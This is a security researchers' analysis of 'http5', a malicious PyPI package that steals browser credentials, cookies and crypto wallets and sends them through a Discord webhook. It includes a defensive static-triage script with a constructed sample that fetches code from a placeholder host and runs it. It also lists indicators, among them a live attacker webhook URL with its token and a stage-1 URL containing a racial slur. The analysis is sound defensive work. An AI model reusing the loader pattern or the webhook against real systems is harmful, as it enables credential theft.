Discock Stealer — Another Polymorphic Malware


What is the package name: http5

When was it released: Jan 3, 2023

Which version we are talking about: 0.0.1

How many times it was downloaded in 30 days: 61

What the package claims to be: “A small example package”

We first observed the package “starjacking” the project https://github.com/pypa/sampleproject and flagged it for further investigation.

From our preliminary analysis, the name ‘http5’ looked suspicious: a victim could fall prey to this package because it sounds like a new version of an HTTP library or of a popular package such as “HTTP3”. So we started analyzing the code.

During our analysis, we came across the name ‘billythegoat356’ in the source code. A quick search yielded very few results, from which we learned that a similar campaign, “WASP Stealer”, is tracked by Checkmarx’s supply chain security research team.

The similarity of the code base and obfuscation techniques to those explained in their blog, together with their research on hunting for WASP Stealer, led us to attribute “Discock Stealer” to “WASP Stealer”.

Further analysis showed that the package was obfuscated using “Hyperion” and specially crafted to target hosts running Windows operating systems. Once the package is installed and executed on the victim’s host, it fetches a malicious piece of Python code and saves it on the victim’s machine.

The package then tries to collect sensitive information such as cookies and saved passwords from browsers and saved cookies of gaming applications, and it steals financial information from crypto wallets. All the discovered data is saved in two files named wppassw.txt and wpcook.txt and later exfiltrated through a Discord webhook API. Additionally, it collects the victim’s geolocation based on the public IP address.

The http5 package initially creates a file with a random name in the temp directory of the victim’s host, which then fetches a malicious piece of code from the stage-1 location: hxxps[:]//www[.]ciqertools[.]xyz/discock

The hosted malicious code looks like the code of the packages mentioned in the Checkmarx research blog posts on WASP Stealer. It also uses the Hyperion obfuscator to obfuscate its code. Since it was not possible to conclude anything quickly from static code analysis, we decided to conduct a dynamic analysis in our sandbox environment.

When we executed the Python code inside a Linux sandbox environment, there was no indication of any network communication or system calls, and it exited immediately. Hence, we decided to test it further in a Windows environment.
When we executed the Python code on Windows, we noted that it tries to perform multiple lookups.

This behaviour (collected data written to wppassw.txt and wpcook.txt, exfiltration through a Discord webhook API, and geolocation of the victim from the public IP address) is quite similar to that of previously known malicious packages shared on the Kaspersky blog.

Though we understand the objective of the adversary here, we are not certain how widespread their campaign is. Attacks on the software supply chain keep evolving day by day. The level of obfuscation used in this package to circumvent security measures highlights the importance of conducting a thorough analysis of the open-source dependencies in use. We also observed a few self-described researchers who published similar packages with malicious content, such as “cxcxcx”. At some point we thought this package could be one of them. However, we continue to research and track the campaign regardless of ecosystem.
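A static triage pass for the loader behaviour described above (temp-directory file, remote fetch, execution, Discord webhook), given here as an added example that is not code from the original post or from the malware. The capability-to-name mapping, the `triage` function and both sample inputs are assumptions constructed for illustration; it only parses source and does not deobfuscate Hyperion output.

```python
import ast
import re

# Capability -> module/function names that expose it. The mapping is an
# assumption chosen for this example, not a signature published by the page.
CAPABILITIES = {
    "temp_file": {"tempfile"},
    "network_fetch": {"urllib", "requests", "httpx", "socket"},
    "process_spawn": {"subprocess", "os.system", "os.popen", "os.startfile"},
    "dynamic_exec": {"exec", "eval", "compile", "__import__"},
}
WEBHOOK_RE = re.compile(r"discord(?:app)?\.com/api/webhooks/\d+/[\w-]+", re.I)


def triage(source):
    """Parse (never run) one source string; return sorted capability tags."""
    seen, found = set(), set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            seen.update(alias.name for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            seen.update(f"{node.module}.{alias.name}" for alias in node.names)
        elif isinstance(node, ast.Call):
            seen.add(ast.unparse(node.func))  # dotted call name, Python 3.9+
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if WEBHOOK_RE.search(node.value):
                found.add("discord_webhook")
    for tag, names in CAPABILITIES.items():
        # "urllib" also matches "urllib.request"; a bare "os" matches nothing.
        if any(s == n or s.startswith(n + ".") for s in seen for n in names):
            found.add(tag)
    fetch_to_temp = {"temp_file", "network_fetch"} <= found
    if fetch_to_temp and found & {"process_spawn", "dynamic_exec"}:
        found.add("LOADER_PATTERN")
    return sorted(found)


# Constructed samples, parsed only. URLs and the webhook id are placeholders.
SUSPICIOUS = '''
import subprocess, tempfile, urllib.request
HOOK = "https://discord.com/api/webhooks/000000/PLACEHOLDER"
path = tempfile.mktemp(suffix=".py")
urllib.request.urlretrieve("https://stage1.example.invalid/x", path)
subprocess.Popen(["python", path])
'''
BENIGN = 'from setuptools import setup\nsetup(name="demo", version="0.0.1")\n'

if __name__ == "__main__":
    print(triage(SUSPICIOUS), triage(BENIGN))
```

A `LOADER_PATTERN` hit is a prompt for manual review of the file, not a verdict; heavily obfuscated code may surface only as `dynamic_exec`.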

  • hxxps[:]//www[.]ciqertools[.]xyz/discock/nigger
  • hxxps[:]//canary.discord.com/api/webhooks/1059836778057580564/bZ3IbBX8QfjxBZ2DLZDi-t5AdHvG-Nzc7QlWrRL76qchpVqH3kstdKNcgvHdiRs4PlE8
  • JA3 — e0ff89ed9185dfb09184797a4c3f2e1c
  • JA3S — f4febc55ea12b31ae17cfb7e614afda8

You can download the rule from here

Dhanesh Hitesh Dodia — Security Researcher, Loginsoft

Kartik Singh — Security Researcher, Loginsoft

For similar attacks, refer to the blogs from the Checkmarx and Phylum research teams.

https://medium.com/checkmarx-security/wasp-attack-on-python-polymorphic-malware-shipping-wasp-stealer-infecting-hundreds-of-victims-10e92439d192

https://medium.com/checkmarx-security/hunting-for-malicious-code-the-dangers-of-wasp-stealer-e0d073913623

https://blog.phylum.io/phylum-discovers-dozens-more-pypi-packages-attempting-to-deliver-w4sp-stealer-in-ongoing-supply-chain-attack
